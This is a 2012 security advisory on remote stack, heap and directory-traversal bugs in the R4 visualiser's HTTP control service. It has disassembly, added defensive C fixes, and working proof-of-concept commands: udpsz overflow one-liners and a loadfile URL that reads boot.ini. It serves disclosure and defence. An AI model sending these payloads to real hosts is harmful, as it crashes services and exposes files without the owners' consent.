R4 1.25 Overflows / Directory Traversal

Published 17 Feb 2012. Reported by Luigi Auriemma. Type: packetstorm. Source: packetstormsecurity.com

R4 1.25 stack and heap overflow, directory traversal

Code
#######################################################################  
  
Luigi Auriemma  
  
Application: R4  
http://r4.rabidhamster.org/R4/  
Versions: <= 1.25  
Platforms: Windows  
Bugs: A] stack overflow  
B] heap overflow  
C] directory traversal  
D] screenshot stack overflow  
Exploitation: remote  
Date: 09 Feb 2012  
Author: Luigi Auriemma  
e-mail: [email protected]  
web: aluigi.org  
  
  
#######################################################################  
  
  
1) Introduction  
2) Bugs  
3) The Code  
4) Fix  
  
  
#######################################################################  
  
===============  
1) Introduction  
===============  
  
  
From vendor's website:  
"R4 is a standalone OpenGL accelerated program which aims to produce  
animated 3D graphics in real-time that twist and turn with the music."  
  
It is widely used at parties and other events that need 3D animations  
driven by the music being played.  
  
  
#######################################################################  
  
=======  
2) Bugs  
=======  
  
  
R4 includes an HTTP service, disabled by default, that allows the  
program to be controlled remotely. It listens on TCP port 8888 (the port  
used by the exploits below). All of the following vulnerabilities are  
located in this component.  
  
  
-----------------  
A] stack overflow  
-----------------  
  
Stack-based buffer overflow: sprintf() builds a log string from the HTTP  
arguments received from the client into a 2 kilobyte (0x800 byte) stack  
buffer with no length check. The %s arguments of the format  
"]%s>%s [%s]" come from the request; a NULL argument is replaced with an  
empty string, but nothing else is validated:  
  
0041ECD0 /$ 8B5424 04 MOV EDX,DWORD PTR SS:[ESP+4]  
0041ECD4 |. 81EC 00080000 SUB ESP,800  
0041ECDA |. 85D2 TEST EDX,EDX  
0041ECDC |. 75 05 JNZ SHORT R4.0041ECE3  
0041ECDE |. BA 349C4B00 MOV EDX,R4.004B9C34  
0041ECE3 |> 8B8C24 08080000 MOV ECX,DWORD PTR SS:[ESP+808]  
0041ECEA |. 85C9 TEST ECX,ECX  
0041ECEC |. 75 05 JNZ SHORT R4.0041ECF3  
0041ECEE |. B9 349C4B00 MOV ECX,R4.004B9C34  
0041ECF3 |> 8B8424 0C080000 MOV EAX,DWORD PTR SS:[ESP+80C]  
0041ECFA |. 85C0 TEST EAX,EAX  
0041ECFC |. 74 2E JE SHORT R4.0041ED2C  
0041ECFE |. 53 PUSH EBX  
0041ECFF |. 8A18 MOV BL,BYTE PTR DS:[EAX]  
0041ED01 |. 84DB TEST BL,BL  
0041ED03 |. 5B POP EBX  
0041ED04 |. 74 26 JE SHORT R4.0041ED2C  
0041ED06 |. 50 PUSH EAX  
0041ED07 |. 51 PUSH ECX  
0041ED08 |. 52 PUSH EDX  
0041ED09 |. 8D4424 0C LEA EAX,DWORD PTR SS:[ESP+C]  
0041ED0D |. 68 60654B00 PUSH R4.004B6560 ; "]%s>%s [%s]"  
0041ED12 |. 50 PUSH EAX ; stack buffer  
0041ED13 |. E8 7B3C0000 CALL R4.00422993 ; sprintf()  
0041ED18 |. 83C4 14 ADD ESP,14  
0041ED1B |. 8D5424 00 LEA EDX,DWORD PTR SS:[ESP]  
0041ED1F |. 52 PUSH EDX  
0041ED20 |. E8 2BFEFFFF CALL R4.0041EB50  
0041ED25 |. 81C4 04080000 ADD ESP,804  
0041ED2B |. C3 RETN  
  
  
----------------  
B] heap overflow  
----------------  
  
Heap overflow (heap corruption) triggered by an overlong HTTP request  
URI (exploit B below sends a request line roughly 20000 bytes long).  
  
  
----------------------  
C] directory traversal  
----------------------  
  
Directory traversal through the "loadfile" script command, which can be  
invoked via left_console.html. The file name argument is not confined to  
the application's directory, so "../" sequences walk up to the root of  
the drive on which the software is installed and any file on that disk  
can be read.  
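The following is an added example, not R4's code and not part of the original advisory. It shows the kind of check that is missing behind the "loadfile" bug: first the weak check many servers ship (searching the name for "../"), which the exploit below would bypass simply by using backslashes, then a resolver that walks the name segment by segment and refuses anything that climbs above a fixed base directory. The install directory C:\R4, the MAX_SEGS limit and the sample file names are assumptions made for the example.

```c
/* Added example, not R4 code: a containment check for a "loadfile"-style
 * command. Both '/' and '\\' count as separators because the target is
 * Windows. The base directory C:\R4 is an assumed value. */
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

#define MAX_SEGS 64

/* Weak check: only the forward-slash spelling is caught, so "..\..\boot.ini"
 * passes. Returns true when the name is (wrongly) considered safe. */
bool naive_traversal_check(const char *name)
{
    return strstr(name, "../") == NULL;
}

static bool is_sep(char c) { return c == '/' || c == '\\'; }

/* Resolves name against base segment by segment. Returns true and writes
 * base\seg\seg... to out when the name stays inside base; returns false
 * (out = "") for absolute or drive-qualified names, for any ".." that would
 * climb above base, and for names that resolve to base itself. name must
 * already be URL-decoded: checking the raw "%2e%2e" form is not enough. */
bool resolve_under_base(const char *base, const char *name, char *out, size_t outsz)
{
    const char *seg[MAX_SEGS];
    size_t seglen[MAX_SEGS];
    int depth = 0;

    out[0] = '\0';
    if (!name || !*name || is_sep(name[0]) || strchr(name, ':'))
        return false;   /* empty, absolute ("\x"), or drive/ADS ("C:", "f:stream") */

    for (const char *p = name; *p; ) {
        const char *start = p;
        while (*p && !is_sep(*p)) p++;
        size_t len = (size_t)(p - start);
        while (is_sep(*p)) p++;

        if (len == 0 || (len == 1 && start[0] == '.'))
            continue;                               /* "" or ".": no-op */
        if (len == 2 && start[0] == '.' && start[1] == '.') {
            if (depth == 0) return false;           /* would escape base */
            depth--;
            continue;
        }
        if (depth == MAX_SEGS) return false;
        seg[depth] = start;
        seglen[depth] = len;
        depth++;
    }
    if (depth == 0) return false;

    size_t used = strlen(base);
    if (used >= outsz) return false;
    memcpy(out, base, used);
    for (int i = 0; i < depth; i++) {
        if (used + 1 + seglen[i] + 1 > outsz) { out[0] = '\0'; return false; }
        out[used++] = '\\';
        memcpy(out + used, seg[i], seglen[i]);
        used += seglen[i];
    }
    out[used] = '\0';
    return true;
}

/* Convenience wrappers with the assumed install directory. */
#define R4_BASE "C:\\R4"
static char resolved[512];

bool loadfile_allowed(const char *name)
{
    return resolve_under_base(R4_BASE, name, resolved, sizeof resolved);
}

const char *loadfile_resolved(const char *name)
{
    return loadfile_allowed(name) ? resolved : "";
}

int main(void)
{
    /* constructed probes: the advisory's traversal string, its backslash
     * variant, an absolute path, and a legitimate name with a harmless ".." */
    const char *probes[] = { "../../../../../boot.ini", "..\\..\\..\\..\\..\\boot.ini",
                             "C:\\boot.ini", "scene/../scene/intro.r4" };
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++)
        printf("%-32s naive=%d resolver=%d -> %s\n", probes[i],
               naive_traversal_check(probes[i]), loadfile_allowed(probes[i]),
               loadfile_resolved(probes[i]));
    return 0;
}
```

The resolver must run on the decoded file name, after the HTTP layer has handled percent-encoding, and it only constrains the path string: it does nothing about junctions or links inside the base directory, and a real fix for a "load this scene file" command would also restrict the allowed file extension.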
  
  
----------------------------  
D] screenshot stack overflow  
----------------------------  
  
Stack-based buffer overflow through the "miniscreenshot" command:  
sprintf() builds a file path with the format "%s/scene/%s.jpg" in a  
0x104 (260) byte stack buffer, and the name passed to the command is  
inserted without any length check:  
  
0040B980 . 8B5424 04 MOV EDX,DWORD PTR SS:[ESP+4]  
0040B984 . 81EC 04010000 SUB ESP,104  
...  
0040BA1F . 8B15 109C4B00 MOV EDX,DWORD PTR DS:[4B9C10]  
0040BA25 . 56 PUSH ESI  
0040BA26 . 52 PUSH EDX  
0040BA27 . 8D4424 14 LEA EAX,DWORD PTR SS:[ESP+14]  
0040BA2B . 68 F02A4B00 PUSH R4.004B2AF0 ; "%s/scene/%s.jpg"  
0040BA30 . 50 PUSH EAX ; stack buffer  
0040BA31 . E8 5D6F0100 CALL R4.00422993 ; sprintf()  
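Bugs A and D are the same defect, an unbounded sprintf() into a fixed-size stack buffer, so one added example covers both. It is not R4's code and not part of the original advisory: the buffer sizes (0x800 and 0x104) and format strings are taken from the two listings above, the filler lengths (3000 and 500 bytes) from the udpsz commands in section 3, and the base path C:\R4 is an assumption. Because actually executing the overflowing sprintf() is undefined behaviour, the block uses snprintf(NULL, 0, ...) to measure how many bytes each call would have written and compares that with the buffer size, then shows a bounded replacement for each call.

```c
/* Added example, not R4 code: the sprintf()-into-fixed-stack-buffer pattern
 * behind bugs A and D, with a bounded replacement for each. */
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

#define LOG_BUF_SIZE  0x800   /* bug A: SUB ESP,800 -> 2 KiB stack buffer */
#define PATH_BUF_SIZE 0x104   /* bug D: SUB ESP,104 -> 260-byte (MAX_PATH) buffer */

/* Bytes the formats need including the terminating NUL, measured without
 * writing anywhere: snprintf(NULL, 0, ...) is the C99 length query. */
static size_t log_line_needed(const char *a, const char *b, const char *c)
{
    int n = snprintf(NULL, 0, "]%s>%s [%s]", a, b, c);
    return n < 0 ? 0 : (size_t)n + 1;
}

static size_t shot_path_needed(const char *base, const char *name)
{
    int n = snprintf(NULL, 0, "%s/scene/%s.jpg", base, name);
    return n < 0 ? 0 : (size_t)n + 1;
}

/* Oracles for the original code: true when the unbounded sprintf() in the
 * listing would write past the end of its stack buffer, i.e. over the saved
 * registers and return address that sit above it. */
bool log_line_overflows(const char *a, const char *b, const char *c)
{
    return log_line_needed(a, b, c) > LOG_BUF_SIZE;
}

bool shot_path_overflows(const char *base, const char *name)
{
    return shot_path_needed(base, name) > PATH_BUF_SIZE;
}

/* Hardened log writer: NULL becomes "" as in the listing, the write is
 * bounded, and truncation is reported. Returns 0 if the whole line fit,
 * -1 if it was truncated (a truncated log line is acceptable). */
int format_log_line(char *out, size_t outsz, const char *a, const char *b, const char *c)
{
    if (!a) a = "";
    if (!b) b = "";
    if (!c) c = "";
    int n = snprintf(out, outsz, "]%s>%s [%s]", a, b, c);
    if (n < 0) { out[0] = '\0'; return -1; }
    return (size_t)n < outsz ? 0 : -1;
}

/* Hardened path builder: a truncated path names a different file, so refuse
 * instead of truncating. Returns 0 on success, -1 if it would not fit. */
int format_shot_path(char *out, size_t outsz, const char *base, const char *name)
{
    int n = snprintf(out, outsz, "%s/scene/%s.jpg", base, name);
    if (n < 0 || (size_t)n >= outsz) { out[0] = '\0'; return -1; }
    return 0;
}

/* Constructed inputs shaped like exploits A and D: runs of 'a' as long as
 * the advisory's udpsz commands send (3000 and 500 bytes). */
static const char *filler(char *buf, size_t n)
{
    memset(buf, 'a', n - 1);
    buf[n - 1] = '\0';
    return buf;
}

bool demo_exploit_a(void)
{
    static char q[3000];
    return log_line_overflows(filler(q, sizeof q), "", "");
}

bool demo_exploit_d(void)
{
    static char name[500];
    return shot_path_overflows("C:\\R4", filler(name, sizeof name));
}

/* Same 3000-byte input through the bounded writer: truncated, not overflowed. */
int demo_hardened_log(void)
{
    static char q[3000];
    char line[LOG_BUF_SIZE];
    int rc = format_log_line(line, sizeof line, filler(q, sizeof q), "", "");
    return (rc == -1 && strlen(line) == LOG_BUF_SIZE - 1) ? 1 : 0;
}

int demo_hardened_path(void)
{
    static char name[500];
    char path[PATH_BUF_SIZE];
    return format_shot_path(path, sizeof path, "C:\\R4", filler(name, sizeof name));
}

/* Ordinary input still formats exactly as before (NULL third argument -> ""). */
int demo_small_log(void)
{
    char line[LOG_BUF_SIZE];
    if (format_log_line(line, sizeof line, "GET", "/", NULL) != 0) return 0;
    return strcmp(line, "]GET>/ []") == 0;
}

int main(void)
{
    printf("exploit A would overflow: %d\n", demo_exploit_a());
    printf("exploit D would overflow: %d\n", demo_exploit_d());
    printf("hardened log truncates cleanly: %d\n", demo_hardened_log());
    printf("hardened path refuses oversize name: %d\n", demo_hardened_path());
    return 0;
}
```

The two replacements differ on purpose: a log line that gets cut short loses nothing security-relevant, whereas a file path that gets cut short silently points at another file, so the path builder fails closed. Neither replacement addresses the traversal in bug C; the path check belongs in a separate step that validates the name before it is ever formatted.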
  
  
#######################################################################  
  
===========  
3) The Code  
===========  
  
  
http://aluigi.org/testz/udpsz.zip  
(the author's packet generator; replace SERVER with the target host, 8888  
is the HTTP service port and the last argument is the size in bytes of the  
filler payload)  
  
A]  
udpsz -T -b a -c "GET /?" 0 -c "HTTP/1.0\r\n\r\n" -1 SERVER 8888 3000  
  
B]  
udpsz -T -b a -c "GET /" 0 -c "HTTP/1.0\r\n\r\n" -1 SERVER 8888 20000  
  
C]  
http://SERVER:8888/left_console.html?cmd=loadfile([../../../../../boot.ini])  
  
D]  
udpsz -T -b a -c "GET /left_console.html?cmd=miniscreenshot([" 0 -c "]) HTTP/1.0\r\n\r\n" -1 SERVER 8888 500  
  
  
#######################################################################  
  
======  
4) Fix  
======  
  
  
No fix.  
  
The HTTP service is disabled by default: leave it disabled, or restrict  
access to TCP port 8888 to trusted hosts until a fixed version is  
available.  
  
  
#######################################################################  
  
  
